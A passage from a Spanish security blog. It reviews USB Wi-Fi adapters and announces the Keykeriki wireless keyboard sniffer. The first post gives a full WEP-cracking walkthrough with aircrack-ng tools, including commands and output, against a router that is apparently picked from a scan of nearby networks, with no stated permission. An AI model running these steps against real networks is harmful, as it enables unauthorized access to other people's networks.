Seguridad y Redes

Tips, Video Tutoriales, Wifislax, VMware, Linux, GNS3, Eve-NG, CCNA, Cisco Routers, Switches

Alfa 2w Modo Monitor (AWUS036NH - rt2800usb)

El alfa 2000mw soporta modo monitor en BackTrack 4 r2 sin instalar nada de nada, automáticamente la reconoce con el driver rt2800usb. El alfa 2w me llego ayer mismo, lo primero que hice es averiguar si soportaba modo monitor y como podrán ver en este post, si que soporta. En cuanto a inyección es brutal!!, arriba de los 500 datas por segundo.
root@bt:~# airmon-ng

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]

root@bt:~#
Iniciamos airmon-ng
root@bt:~# airmon-ng start wlan0

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                        (monitor mode enabled on mon0)

root@bt:~#
Ahora lo tenemos en modo monitor, listo para empezar auditar!!
root@bt:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any
    Mode:Managed  Access Point: Not-Associated   Tx-Power=7 dBm
    Retry  long limit:7   RTS thr:off   Fragment thr:off
    Encryption key:off
    Power Management:on

mon0      IEEE 802.11bgn  Mode:Monitor  Tx-Power=7 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

root@bt:~#
Iniciamos airodump-ng para mirar un objetivo.
 CH  6 ][ Elapsed: 4 s ][ 2011-02-26 13:16

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:4C:A9:XX:XX:XX   33        3        0    0  11  54e  WEP  WEP         GUSAB
5C:4C:A9:XX:XX:XX   33        4        0    0   1  54e  WEP  WEP         INFINITUMcb9
00:18:3F:XX:XX:XX    6        5        0    0   6  54 . WEP  WEP         2WIRE6743

BSSID              STATION            PWR   Rate    Lost  Packets  Probes
Una vez escogido el objetivo, lanzamos airodump-ng.
root@bt:~# airodump-ng --bssid 00:18:3F:XX:XX:XX -c 6 -w captura mon0
Lanzado airodump-ng, ahora toca asociarnos con el objetivo.
root@bt:~# aireplay-ng -e 2WIRE6743 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -1 0 mon0
13:19:11  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6

13:19:11  Sending Authentication Request (Open System) [ACK]
13:19:11  Authentication successful
13:19:11  Sending Association Request [ACK]
13:19:11  Association successful :-) (AID: 1)
Como puede ver, con el alfa 2w asocio a la primera y eso que el router estaba muy distante y con muchos obstáculos. Ahora solo lanzamos cualquier ataque con el areplay-ng, en mi caso lance el ataque de fragmentación (ataque 5).
root@bt:~# aireplay-ng -5 -b 00:18:3F:XX:XX:XX  -h 00:C0:CA:XX:XX:XX mon0

13:19:20  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6
13:19:20  Waiting for a data packet...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

      BSSID  =  00:18:3F:XX:XX:XX
  Dest. MAC  =  FF:FF:FF:FF:FF:FF
 Source MAC  =  00:18:3F:XX:XX:XX

0x0000:  0842 3a01 ffff ffff ffff 0018 3f18 85c9  .B:.........?...
0x0010:  0018 3f18 85c9 6076 c7c0 3f00 3130 92ea  ..?...`v..?.10..
0x0020:  f56f eb33 e447 71e0 3365 0e61 e8f1 dd2a  .o.3.Gq.3e.a...*
0x0030:  1246 669b bf66 bd76 e9dd 234a b45d 9327  .Ff..f.v..#J.].'
0x0040:  4642 6ad2                                FBj.

Use this packet ? y

Saving chosen packet in replay_src-0226-131920.cap
13:19:22  Data packet found!
13:19:22  Sending fragmented packet
13:19:22  Got RELAYED packet!!
13:19:22  Trying to get 384 bytes of a keystream
13:19:22  Got RELAYED packet!!
13:19:22  Trying to get 1500 bytes of a keystream
13:19:22  Got RELAYED packet!!
Saving keystream in fragment-0226-131922.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
root@bt:~#
Y como pueden ver es totalmente soportado y la inyeccion es brutal!!. Una vez generado el archivo PRGA (del ingles “pseudo random generation algorithm” o algoritmo de generación seudo aleatoria) con extención ".xor", usaremos packetforge-ng para crear un paquete arp. Nuestro objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
root@bt:~# packetforge-ng -0 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y fragment-0226-131922.xor -w ARP
Wrote packet to: ARP
Inyección del paquete ARP con areplay-ng.
root@bt:~# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:XX:XX:XX)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

      BSSID  =  00:18:3F:XX:XX:XX
  Dest. MAC  =  FF:FF:FF:FF:FF:FF
 Source MAC  =  00:C0:CA:XX:XX:XX

0x0000:  0841 0201 0018 3f18 85c9 00c0 ca4a 8297  .A....?......J..
0x0010:  ffff ffff ffff 8001 c7c0 4300 1018 b7e1  ..........C.....
0x0020:  6cde c857 5ad1 d077 a046 b99e 35b7 98fa  l..WZ..w.F..5...
0x0030:  5f01 7c1c 5afb 7836 bc01 eaa3 f9f8 b69e  _.|.Z.x6........
0x0040:  02ca b6ee                                ....

Use this packet ? y

Saving chosen packet in replay_src-0226-131938.cap
You should also start airodump-ng to capture replies.
En el anterior paso habrán bien los ojos! y miren como inyecta el alfa 2000mw. Por ultimo lanzamos aircrack-ng para obtener la clave WEP.
root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 106515 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:XX:XX:XX  2WIRE6743                 WEP (32632 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 32822 ivs.

                         Aircrack-ng 1.1 r1738


         [00:00:00] Tested 258 keys (got 32812 IVs)

KB    depth   byte(vote)
0   30/ 33   92(36096) 62(35840) 76(35840) 84(35840) BC(35840)
1    0/  1   02(47616) 6A(41216) E8(40704) 03(40192) D3(40192)
2    0/  4   95(44544) 9A(42496) 44(39936) 31(39680) 15(38912)
3    0/  2   92(45568) F4(40704) 05(40448) 86(40448) 35(39424)
4    0/  1   80(48896) 1E(40192) 7A(39936) 16(39424) 94(39424)

                 KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%

root@bt:~#
Sin duda me sorprendi, ya que antes de comprar el alfa, donde quiera habia leido que no servia para auditoria, pero ya ven si que sirve. Ha sido mi mejor adquisicion, para mi es la mejor de todas, tengo otros tres dipositivos USB, el WifiSky, el Kasens G5000 y el dragon FL-2016G pero sin duda puedo decir que barre con las tres!

Saludos y ahora que me entreguen mi camara lestomare unas fotitos para compartirlo con todos y platicarles el precio y los detalles de esta nueva adquisición.

Update:
Por cierto ya estan las primeras imagenes de BackTrack 5 !!!

WiFiSKY 1500mw 20G

Por fin a llegado directa de Hong Kong el wifisky 1500mw 20G, comprada en ebay, después de varias semanas esperando por fin ha llegado a las puertas de mi casa y en este post quisiera compartirles mis primeras impresiones sobre este dispositivo USB con el famoso chipset rt8187.

Este dispositivo inalámbrico trae consigo una antena de 5dbi con entrada rp-sma y así poder conectar en esta entrada otra antena con mayor alcance según nuestra necesidad. Les dejo unas fotos del paquete.

El color es muy bonito y la caja está bien presentada, la verdad la desventaja que le he visto es de que tardo un poco solo eso y todo lo demás esta muy bien, ya que puedes realizar auditorías y demás cosas. Venía con un cable USB, CD de instalación y la antena de 5dbi, además de todo esto lo mejor es el precio, me ha costado solamente $14.98 US con todo y envió, sin duda muy buen dispositivo y a un precio tan económico.

La única deficiencia que le veo es que le afecta mucho el ruido, es decir donde existen muchos Routers es un poco complicado tener la conectividad si el Router está muy distante, pero es muy bueno sin duda en entornos con menos APs a su alrededor, pero en cuanto a auditoria Wifi es bestial!. Mirar aquí un pantallazo del Wifisky en acción.

WiFiSKY 1500mw 20G en Acción.
Aquí las especificaciones del vendedor:
Wireless standards: IEEE802.11b/g USB2.0 standard(also compatible with USB1.1)
Interface: USB2.0 standard, compatible with USB1.1
Frequcenfy Band: 2412-2462MHZ(US)11 channels.
                 2412-2472MHZ(EU)13 channels.
                 2412-2482MHZ(Japan)14 channels
Modulation: BPSK, QPSK, CCK and OFDM
Antenna Type: 5dBi RP SMA dopole antenna
Security: WEP64/128, 802.1 Xsupport.
          WiFi Protected Access(WPA), WPA-PSK, WPAII
Supports Data Rate: 54mbps High speed transfer rate for 802.11g
LED: Link / Active
Operating System Support: Windows 98SE,ME,2000,XP,Vista,Linux,Mac
Operating Temp: - 20°C - +70°C
Storage Temp: - 40°C - +80°C
Rated Power: =1500MW(1.5w)

Keykeriki Liberado

Remote-Exploit.org libera Keykeriki, un sniffer que captura todos los datos pulsados en un teclado inalambrico.
Description: Now 1.5 years after releasing our whitepaper "27Mhz Wireless Keyboard Analysis Report" about wireless keyboard insecurities, we are proud to present the universal wireless keyboard sniffer: Keykeriki. This opensource hardware and software project enables every person to verify the security level of their own keyboard transmissions, and/or demonstrate the sniffing attacks (for educational purpose only). The hardware itself is designed to be small and versatile, it can be extended to currently undetected/unknown keyboard traffic, and/or hardware extensions, for example, a repeating module or amplifier

Keykeriki en acción.

Para mas detalles visitar la web de Remote-Exploit http://www.remote-exploit.org/Keykeriki.html